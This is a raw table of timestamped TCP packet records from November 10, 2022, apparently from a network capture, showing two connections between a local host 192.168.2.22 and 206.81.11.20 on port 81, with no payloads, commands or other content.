Nov 10, 2022 11:43:11.965792894 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965804100 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965804100 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965811014 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965817928 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965817928 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965828896 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965842009 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965846062 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965863943 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965864897 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965876102 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965876102 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965883017 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965897083 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965899944 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965918064 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965919018 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965919018 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965928078 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965934992 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965953112 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965967894 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965970993 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965980053 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965980053 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965990067 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.966007948 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.966018915 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.966027021 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.966037035 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.966037035 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.966046095 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.966063976 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.966077089 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.966080904 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.966098070 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.966098070 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.966098070 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.966116905 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.966126919 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.966134071 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.966145992 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.966145992 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.966151953 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.966177940 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.966193914 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.966193914 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.966223001 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967082024 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967101097 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967185974 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967185974 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967248917 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967291117 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967308044 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967309952 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967329025 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967338085 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967348099 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967365026 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967372894 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967372894 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967382908 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967401028 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967410088 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967420101 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967431068 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967437983 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967449903 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967456102 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967467070 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967473984 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967490911 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967490911 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967490911 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967509985 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967526913 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967530012 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967544079 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967547894 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967549086 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967560053 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967576027 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967578888 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.967588902 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967614889 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967633963 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.967633963 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968259096 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968278885 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968297005 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968317032 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968334913 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968336105 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968336105 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968353033 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968372107 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968370914 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968370914 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968389034 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968406916 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968408108 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968424082 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968435049 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968441963 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968446970 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968460083 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968467951 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968467951 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968478918 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968493938 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968507051 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968507051 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968513012 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968545914 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968558073 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968575001 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968594074 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968605995 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968611956 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968632936 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968636990 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968651056 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968683004 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968694925 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968702078 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968725920 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968734026 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968779087 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968796968 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968813896 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968815088 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968832016 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.968844891 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968878984 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.968987942 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969021082 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969055891 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969073057 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969074011 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969091892 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969110966 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969126940 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969129086 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969147921 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969157934 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969166040 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969177008 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969185114 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969197035 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969202995 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969212055 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969221115 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969233990 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969238997 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969250917 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969271898 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969278097 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969291925 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969294071 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969310045 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969324112 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969335079 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969352961 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969356060 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969371080 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969381094 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969389915 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969396114 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969408035 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969425917 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969425917 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969444036 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969461918 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969477892 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969480038 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969497919 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969507933 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969516039 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969530106 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969533920 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969547987 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969552994 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969562054 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969569921 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969588041 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969589949 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969589949 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969599009 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969604969 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969624996 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969633102 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969641924 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969651937 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969660044 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969672918 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969679117 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969686031 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969696999 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969715118 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969732046 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969741106 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969749928 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969768047 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969785929 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969789982 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969803095 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969804049 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969804049 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969813108 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969813108 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969820976 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969840050 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969854116 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969857931 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969876051 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969885111 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969893932 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969911098 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969926119 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969928980 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969945908 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969955921 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.969963074 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969981909 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.969986916 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970000029 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970016003 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970016956 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970035076 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970052004 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970058918 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970071077 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970088005 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970093012 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970101118 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970104933 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970124960 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970134020 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970141888 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970160007 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970170021 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970176935 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970196962 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970205069 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970215082 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970233917 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970237017 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970252037 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970269918 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970282078 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970288038 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970304966 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970314026 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970323086 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970340967 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970345020 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970360041 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970377922 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970390081 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970396042 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970413923 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970418930 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970432997 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970449924 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970467091 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970468044 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970484018 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970501900 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970519066 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970520020 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970536947 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970551014 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970554113 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970572948 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970582962 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970592022 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970609903 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970613956 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970628977 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970647097 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970657110 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970664024 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970684052 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970686913 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970701933 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970721006 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970733881 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970738888 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970756054 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970762968 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970773935 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970792055 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970792055 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970810890 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970829010 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970846891 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970849037 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970864058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970894098 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970895052 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970912933 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970932007 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970946074 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970949888 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970971107 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.970974922 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.970988035 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971005917 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971021891 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971024990 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971043110 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971062899 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971069098 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971081018 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971098900 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971101046 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971117020 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971134901 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971148014 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971153021 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971170902 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971189022 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971199036 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971206903 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971226931 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971230984 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971244097 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971262932 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971277952 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971281052 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971301079 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971318960 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971326113 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971337080 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971354961 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971360922 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.971373081 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.971390963 CET	81	49172	206.81.11.20	192.168.2.22
